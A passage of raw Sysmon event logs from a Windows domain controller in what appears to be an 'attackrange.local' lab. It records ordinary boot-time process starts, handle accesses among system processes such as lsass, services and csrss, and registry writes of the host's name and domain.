l.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.883{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.883{10ACEC4A-853E-5FCF-0A00-000000009101}852940C:\Windows\system32\services.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.868{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.868{10ACEC4A-853E-5FCF-0A00-000000009101}852856C:\Windows\system32\services.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19bbb|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.852{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.852{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.852{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.836{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.712{10ACEC4A-853E-5FCF-0A00-000000009101}852940C:\Windows\system32\services.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.712{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.712{10ACEC4A-853E-5FCF-0A00-000000009101}852856C:\Windows\system32\services.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19e30|C:\Windows\system32\services.exe+19b29|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.719{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:04.712{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:04.102{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database EpochDWORD (0x00001934) 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:03.430{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:03.430{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:03.430{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:03.399{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:03.399{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:03.071{10ACEC4A-853E-5FCF-0B00-000000009101}864868C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+4e37c|C:\Windows\system32\lsasrv.dll+56c8f|C:\Windows\system32\lsasrv.dll+620fe|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.962{10ACEC4A-853E-5FCF-0700-000000009101}716720C:\Windows\system32\wininit.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.962{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.946{10ACEC4A-853E-5FCF-0700-000000009101}716720C:\Windows\system32\wininit.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.960{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.899{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.899{10ACEC4A-853E-5FCF-0700-000000009101}716720C:\Windows\system32\wininit.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.897{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exe10.0.14393.3383 (rs1_release.191125-1816)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=457FD1B4ED8D29816560345AE5BA9B73,SHA256=D99AA02447946EFB935B11D21DF99AFDDA0955A588D6AAC42746DE73E1253956,IMPHASH=264C7CFAFE91682E421A605C58E86E40{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.712{10ACEC4A-853E-5FCF-0600-000000009101}708712C:\Windows\System32\smss.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.713{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{10ACEC4A-853E-5FCF-0600-000000009101}708C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c 10341000x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.696{10ACEC4A-853D-5FCF-0200-000000009101}448456C:\Windows\System32\smss.exe{10ACEC4A-853E-5FCF-0800-000000009101}724C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:02.680{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domainattackrange.local 13241300x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:02.680{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostnamewin-dc-935 10341000x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 